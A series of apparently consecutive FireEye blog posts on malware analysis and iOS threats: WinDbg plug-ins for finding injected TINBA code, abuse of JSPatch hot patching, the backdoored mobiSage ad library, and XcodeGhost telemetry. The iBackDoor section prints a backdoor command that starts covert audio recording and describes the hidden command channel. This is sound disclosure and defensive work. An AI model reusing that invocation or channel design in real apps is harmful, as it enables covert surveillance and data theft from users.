The injectfind plug-in is loosely based on the Volatility malfind plug-in. Given a memory dump, the Volatility plug-in searches memory for injected code and shows the analyst what it finds within each process. Instead of requiring a memory dump, the injectfind WinDbg plug-in runs inside a live debugger session. Similar to malfind, the injectfind plug-in identifies memory regions that may have had code injected, and prints a hex dump and a disassembly listing of each identified memory region. A quick glance at the output helps us identify injected code or hooked functions. The following section shows an example of an analyst identifying injected code with injectfind.
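The kind of heuristic that malfind-style tools apply can be approximated as follows (a Python sketch over region descriptors; the exact criteria injectfind uses are not spelled out here, so treat the predicate as an approximation):

```python
# Sketch of a malfind-style heuristic: injected code typically lives in
# private, committed, executable memory that is not backed by an image or
# file on disk. injectfind's actual predicate may differ in detail.

def looks_injected(region):
    return (
        region["type"] == "MEM_PRIVATE"       # not file- or image-backed
        and region["state"] == "MEM_COMMIT"   # actually resident
        and "EXECUTE" in region["protect"]    # executable pages
    )

def find_injected(regions):
    """Return the base addresses of regions flagged as likely injected."""
    return [r["base"] for r in regions if looks_injected(r)]
```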


After running the TINBA malware in an analysis environment, we observe that the initial loader process exits immediately, and the explorer.exe process begins making network requests to seemingly random domains. After attaching to the explorer.exe process with WinDbg and running the injectfind plug-in, we see the output shown in Figure 1.

Figure 1: Output from the injectfind plug-in

The first memory region at virtual address 0x1700000 appears to contain references to Windows library functions and is 0x17000 bytes in size. It is likely that this memory region contains the primary payload of the TINBA malware.

The second memory region at virtual address 0x1CD0000 contains a single page, 0x1000 bytes in length, and appears to have two lines of meaningful disassembly. The disassembly shows the eax register being set to 0x30 and a jump five bytes into the NtCreateProcessEx function. Figure 2 shows the disassembly of the first few instructions of the NtCreateProcessEx function.

Figure 2: NtCreateProcessEx disassembly listing

The first instruction of NtCreateProcessEx is a jmp to an address outside of ntdll's memory. The destination address is within the first memory region that injectfind identified as injected code. We can quickly conclude, entirely from within a WinDbg debugger session, that the malware hooks the process creation function.


membreak
One feature missing from WinDbg that is present in OllyDbg and x64dbg is the ability to set a breakpoint on an entire memory region. This type of breakpoint is known as a memory breakpoint. Memory breakpoints are used to pause a process when any address within a specified region of memory is executed.

Memory breakpoints are useful when you want to break on code execution without specifying a single address. For example, many packers unpack their code into a new memory region and begin executing somewhere in this new memory. Setting a memory breakpoint on the new memory region would pause the debugger at the first execution anywhere within the new memory region. This obviates the need to tediously reverse engineer the unpacking stub to identify the original entry point.

One way to implement memory breakpoints is by changing the memory protection for a memory region by adding the PAGE_GUARD memory protection flag. When this memory region is executed, a STATUS_GUARD_PAGE_VIOLATION exception occurs. The debugger handles the exception and returns control to the user. The flare-dbg plug-in membreak uses this technique to implement memory breakpoints.
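The mechanics can be sketched as follows (Python for illustration, without live Win32 calls; the constants are the documented Windows values, while the helper names are ours, and on a real target the protection change would go through VirtualProtectEx):

```python
# Sketch of the PAGE_GUARD technique membreak uses, modeled without live
# Windows API calls. PAGE_GUARD is a modifier flag OR'd into a region's
# protection; the first access then raises STATUS_GUARD_PAGE_VIOLATION.

PAGE_SIZE = 0x1000
PAGE_GUARD = 0x100
STATUS_GUARD_PAGE_VIOLATION = 0x80000001

def page_base(address):
    """Round an address down to its page boundary."""
    return address & ~(PAGE_SIZE - 1)

def add_guard(protect):
    """Protection value to arm the breakpoint (e.g. via VirtualProtectEx)."""
    return protect | PAGE_GUARD

def on_exception(code, old_protect):
    """When the guard page fires, restore the original protection.

    Returns the protection to re-apply, or None if the exception is not a
    guard-page violation and should be passed on to the debuggee.
    """
    if code == STATUS_GUARD_PAGE_VIOLATION:
        return old_protect  # restore and hand control back to the analyst
    return None
```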


After locating the injected code using the injectfind plug-in, we set a memory breakpoint to pause execution within the injected code memory region. The membreak plug-in accepts one or multiple addresses as parameters. The plug-in takes each address, finds the base address for the corresponding memory region, and changes the entire region’s permissions. As shown in Figure 3, when the membreak plug-in is run with the base address of the injected code as the parameter, the debugger immediately begins running until one of these memory regions is executed.

Figure 3: membreak plug-in run in WinDbg

The output for the memory breakpoint hit shows a Guard page violation and a message about first chance exceptions. As explained above, this should be expected. Once the breakpoint is hit, the membreak plug-in restores the original page permissions and returns control to the analyst.


importfind
Malware often loads Windows library functions at runtime and stores the resolved addresses as global variables. Sometimes it is trivial to resolve these statically in IDA Pro, but other times this can be a tedious process. To speed up the labeling of these runtime imported functions, we created a plug-in named importfind to find these function addresses. Behind the scenes, the plug-in parses each library's export table and finds all exported function addresses. The plug-in then searches the malware’s memory and identifies references to the library function addresses. Finally, it generates an IDAPython script that can be used to annotate an IDB workspace with the resolved library function names.
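The final step can be sketched as follows (a Python sketch; the mapping format, helper name, and output file name are illustrative, not importfind’s actual interface):

```python
# Sketch of importfind's final step: given resolved {address: "dll!Function"}
# pairs found in the malware's memory, emit an IDAPython script that renames
# the corresponding globals in the IDB. idc.set_name is the IDAPython rename
# call; the helper and file names here are hypothetical.

def make_idapython_script(resolved, path="rename_imports.py"):
    lines = ["import idc", ""]
    for addr, name in sorted(resolved.items()):
        # Label the global variable that holds the resolved pointer.
        safe = name.replace("!", "_").replace(".", "_")
        lines.append('idc.set_name(0x%X, "%s")' % (addr, safe))
    script = "\n".join(lines) + "\n"
    with open(path, "w") as f:
        f.write(script)
    return script
```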


Going back to TINBA, we saw text referencing Windows library functions in the output from injectfind above. The screenshot of IDA Pro in Figure 4 shows this same region of data. Note that following each ASCII string containing an API name, there is a number that looks like a pointer. Unfortunately, IDA Pro does not have the same insight as the debugger, so these addresses are not resolved to API functions and named.

Figure 4: Unnamed library function addresses

We use the importfind plug-in to find the function names associated with these addresses, as shown in Figure 5.

Figure 5: importfind plug-in run in WinDbg

The importfind plug-in generates an IDAPython script file that renames these global variables in our IDB. Figure 6 shows a screenshot from IDA Pro after the script has renamed the global variables to more meaningful names.

Figure 6: IDA Pro with named global variables

Conclusion
This blog post shows the power of using the flare-dbg plug-ins with a debugger to gain insight into how the malware operates at runtime. We saw how to identify injected code using the injectfind plug-in and create memory breakpoints using membreak. We also demonstrated the usefulness of the importfind plug-in for identifying and renaming runtime imported functions.

To find out how to set up and get started with flare-dbg, head over to the GitHub project page, where you’ll learn about setup and usage.

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching


Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp:// in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work needed to enable it is to add seven lines of code to the application:didFinishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp:// that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app [1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4 [2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device

Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server
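The layered wrapping of the stored patch can be modeled as follows (a Python sketch; only the outer Base64 layer is faithful to the app, while the inner cipher and key here are a stand-in single-byte XOR, not the app’s actual symmetric algorithm, whose plaintext we recovered at runtime via Cycript):

```python
# Sketch of peeling the layered wrapping of the stored patch content:
# Base64 on the outside, a symmetric cipher on the inside. The XOR below is
# purely an illustrative stand-in for the app-specific inner cipher.

import base64

def unwrap_patch(blob_b64, key=b"\x5a"):
    ciphertext = base64.b64decode(blob_b64)  # outer layer: Base64
    # Hypothetical inner layer: single-byte XOR as a stand-in cipher.
    return bytes(b ^ key[0] for b in ciphertext)
```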

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:

Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing any meaningful exploit in this blog post; instead, we only point out the possibilities, to prevent low-skilled attackers from taking advantage of off-the-shelf exploits.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
b.     Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate Apple apps’ private framework usage and a third party app’s private framework usage. It is simply the App Store policy that bans third party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process


Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: /System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device


Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user’s photo album by leveraging the public APIs of the built-in Photos.framework to harvest the metadata of photos. With a bit more code, one could export this image data to a remote location without the user’s knowledge.

Figure 15. JavaScript code that accesses the Photo Library


Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
b.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

iOS pasteboard is one of the mechanisms that allows a user to transfer data between apps. Some security researchers have raised concerns regarding its security, since pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scrapes the pasteboard, which might contain sensitive information


Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS’ native capability is dependent on C functions (for example, dlopen(), UIGetScreenImage()). Because C functions cannot be reflectively invoked, JSPatch does not support mapping them directly to JavaScript the way it does Objective-C methods. In order to use C functions in JavaScript, an app must implement JSExtension, which packs each C function into a corresponding interface that is then exported to JavaScript.

This dependency on additional Objective-C code to expose C functions places limits on a malicious actor’s ability to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limits can easily be lifted should an app developer choose to add a bit more Objective-C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, granted there is enough demand. In that case, all of the above operations could become reality without Apple’s consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to identify that the JavaScript content, which is not subject to any review process, is a potential Achilles heel in this app development architecture. Since there are few to zero security measures to ensure the security properties of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackdoor in 2015 is an alarming example of displaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

           Figure 21. Threat model for JSPatch used by an app targeted by MITM

Field Survey

JSPatch originated in China. Since its release in 2015, it has seen widespread adoption within China. According to JSPatch, many popular and high-profile Chinese apps have adopted the technology. FireEye app scanning found a total of 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple’s App Store for helping to keep iOS malware at bay. While the App Store undeniably plays a critical role in earning that reputation, it does so at the cost of app developers’ time and resources.

One manifestation of this cost is the app hot-patching process: even a simple bug fix must go through the app review process, subjecting developers to an average wait of seven days before updated code is approved. It is thus not surprising to see developers seeking solutions that bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers doubt that the App Store would accept technologies that leverage scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues that it complies with Apple’s iOS Developer Program Information, which makes an exception for scripts and code downloaded and run by Apple’s built-in WebKit framework or JavaScriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by App Store policy. JSPatch is walking a fine line, but it is not alone. In upcoming reports, we intend to examine other such offerings in search of one that satisfies both Apple and the developer community without jeopardizing users’ security. Stay tuned!


[1] We have contacted the app provider regarding the issue. To protect the app vendor and its users, we have chosen not to disclose the app’s identity until the issue is addressed.
[2] The redacted part is the hardcoded decryption key.


iBackDoor: High-Risk Code Hits iOS Apps


FireEye mobile researchers recently discovered potentially “backdoored” versions of an ad library embedded in thousands of iOS apps originally published in the Apple App Store. The affected versions of this library embedded functionality in iOS apps that used the library to display ads, allowing for potential malicious access to sensitive user data and device functionality. NOTE: Apple has worked with us on the issue and has since removed the affected apps.

These potential backdoors could have been controlled remotely by loading JavaScript code from a remote server to perform the following actions on an iOS device:

  • Capture audio and screenshots
  • Monitor and upload device location
  • Read/delete/create/modify files in the app’s data container
  • Read/write/reset the app’s keychain (e.g., app password storage)
  • Post encrypted data to remote servers
  • Open URL schemes to identify and launch other apps installed on the device
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button

The offending ad library contained identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the potentially backdoored ad library: version codes 5.3.3 to 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2] – version 7.0.5 – the potential backdoors are not present. It is unclear whether the potentially backdoored versions of the ad library were released by adSage or if they were created and/or compromised by a malicious third party.

As of November 4, we have identified 2,846 iOS apps containing the potentially backdoored versions of the mobiSage SDK. Among these, we observed more than 900 attempts to contact an adSage server capable of delivering JavaScript code to control the backdoors. We notified Apple of the complete list of affected apps and technical details on October 21, 2015.

While we have not observed the ad server deliver any malicious commands intended to trigger the most sensitive capabilities, such as recording audio or stealing sensitive data, affected apps periodically contact the server to check for new JavaScript code. In the wrong hands, malicious JavaScript code that triggers the potential backdoors could be posted to the server and eventually downloaded and executed by affected apps.

Technical Details

As shown in Figure 1, the affected mobiSage library included two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the potential backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the potential backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

Figure 2: Communication via URL loading in WebView

To process a command in its queue, msageCore dispatches the command, along with its parameters, to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

Figure 3: Command dispatch in msageCore
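The URL-based command channel and dispatch described above can be sketched as follows. This is a hypothetical Python reconstruction (the SDK itself is Objective-C/JavaScript), and the handler names and return values are illustrative, not the SDK's actual symbols:

```python
from urllib.parse import urlparse, unquote

# Hypothetical dispatch table standing in for msageCore's routing of
# commands to Objective-C classes and methods.
HANDLERS = {
    "captureAudio": lambda parameter: ("captureAudio", parameter),
}

def handle_request(url):
    # Intercept a WebView load of an adsagejs:// URL and dispatch the command.
    # The article gives the format adsagejs://cmd&parameter; the exact
    # encoding is not public, so this parser is a best-guess sketch.
    parsed = urlparse(url)
    if parsed.scheme != "adsagejs":
        return None  # let the WebView load ordinary URLs untouched
    cmd, _, parameter = parsed.netloc.partition("&")
    handler = HANDLERS.get(cmd)
    return handler(unquote(parameter)) if handler else None

print(handle_request("adsagejs://captureAudio&10"))  # ('captureAudio', '10')
print(handle_request("https://example.com/ad"))      # None (normal page load)
```

The key design point is that a scheme handler inside a WebView delegate gives the JavaScript layer a covert, fire-and-forget call path into native code, with no user-visible network traffic.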

At-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

  • captureAudio:, captureImage:, openMail:, openSMS:, openApp:, openInAppStore:, openCamera:, openImagePicker:, ...

  • start:, stop:, setTimer:, returnLocationInfo:webViewId:, ...

  • createDir, deleteDir:, deleteFile:, createFile:, getFileContent:, ...

  • writeKeyValue:, readValueByKey:, resetValueByKey:

  • sendHttpGet:, sendHttpPost:, sendHttpUpload:, ...

  • MD5Encrypt:, SHA1Encrypt:, AESEncrypt:, AESDecrypt:, DESEncrypt:, DESDecrypt:, XOREncrypt:, XORDecrypt:, RC4Encrypt:, RC4Decrypt, ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the potential backdoors in the library. They expose the potential ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

Beyond the selected interfaces, the ad library potentially exposed users to additional risks by including logic to promote and install “enpublic” apps as shown in Figure 4. As we have highlighted in previous blogs [3, 4, 5, 6, 7], enpublic apps can introduce additional security risks by using private APIs in certain versions of iOS. These private APIs potentially allow for background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations. Apple has addressed a number of issues related to enpublic apps that we have brought to their attention.

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

We can see how this ad library functions by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

Figure 5: Capturing audio with duration and threshold

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

Figure 6: Reading the keychain in the kSecClassGenericPassword class

Remote control in msageJS

msageJS contains JavaScript code for communicating with a remote server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

Figure 7: The file layout of msageJS

The command execution interface is constructed as follows:

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

Figure 8: Base64 encoded JavaScript component in Zip format
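The zip-then-Base64 packaging can be reproduced in a few lines. This Python sketch uses stand-in file contents (the file names match Figure 7) and only illustrates the layering, not the SDK's actual decoder:

```python
import base64
import io
import zipfile

def pack(files):
    # Zip the msageJS files in memory, then Base64-encode the archive, as
    # the article describes the payload being stored in the binary's data
    # section.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return base64.b64encode(buf.getvalue()).decode("ascii")

def unpack(blob):
    # Decode and open the archive, as msageCore does before extracting
    # msageJS into the app's data container.
    zf = zipfile.ZipFile(io.BytesIO(base64.b64decode(blob)))
    return {name: zf.read(name).decode("utf-8") for name in zf.namelist()}

blob = pack({"index.html": "<html></html>", "sdkjs.js": "var adsage = {};"})
print(sorted(unpack(blob)))  # ['index.html', 'sdkjs.js']
```

Because the payload sits in the binary as an opaque Base64 blob, a naive scan of the IPA's file listing or string table never sees the JavaScript component, which is why the files "cannot be found by simply listing the files".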

When msageJS is launched, it sends a POST request to hxxp:// to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9.

Figure 9: Server response to msageJS update request via HTTP POST

Enterprise Protection

To ensure the protection of our customers, FireEye has deployed detection rules in its Network Security (NX) and Mobile Threat Prevention (MTP) products to identify the affected apps and their network activities.

For FireEye NX customers, alerts will be generated if an employee uses an infected app while their iOS device is connected to the corporate network. FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users will receive on-device notifications of the risky app and IT administrators receive email alerts.


In this blog, we described an ad library that affected thousands of iOS apps with potential backdoor functionality. We revealed the internals of backdoors which could be used to trigger audio recording, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these potential backdoors in ad libraries could be controlled remotely by JavaScript code should their ad servers fall under malicious actors’ control.


XcodeGhost S: A New Breed Hits the US

Just over a month ago, iOS users were warned of the threat to their devices by the XcodeGhost malware. Apple quickly reacted, taking down infected apps from the App Store and releasing new security features to stop malicious activities. Through continuous monitoring of our customers’ networks, FireEye researchers have found that, despite the quick response, XcodeGhost has persisted and been modified.

More specifically, we found that:

  • XcodeGhost has entered into U.S. enterprises and is a persistent security risk
  • Its botnet is still partially active
  • A variant we call XcodeGhost S reveals more advanced samples went undetected

After monitoring XcodeGhost-related activity for four weeks, we observed 210 enterprises with XcodeGhost-infected applications running inside their networks, generating more than 28,000 attempts to connect to the XcodeGhost Command and Control (CnC) servers -- which, while not under attacker control, are vulnerable to hijacking by threat actors. Figure 1 shows the top five countries XcodeGhost attempted to call back to during this time.

Figure 1. Top five countries XcodeGhost attempted to call back to in a four-week span

The 210 enterprises we detected with XcodeGhost infections represent a wide range of industries. Figure 2 shows the top five industries affected by XcodeGhost, sorted by the percentage of callback attempts to the XcodeGhost CnC servers from inside their networks:

Figure 2: Top five industries affected based on callback attempts

Researchers have demonstrated how XcodeGhost CnC traffic can be hijacked to:

  • Distribute apps outside the App Store
  • Force browse to URL
  • Aggressively promote any app in the App Store by launching the download page directly
  • Pop-up phishing windows

Figure 3 shows the top 20 most active infected apps among 152 apps, based on data from our DTI cloud:

Figure 3: Top 20 infected apps

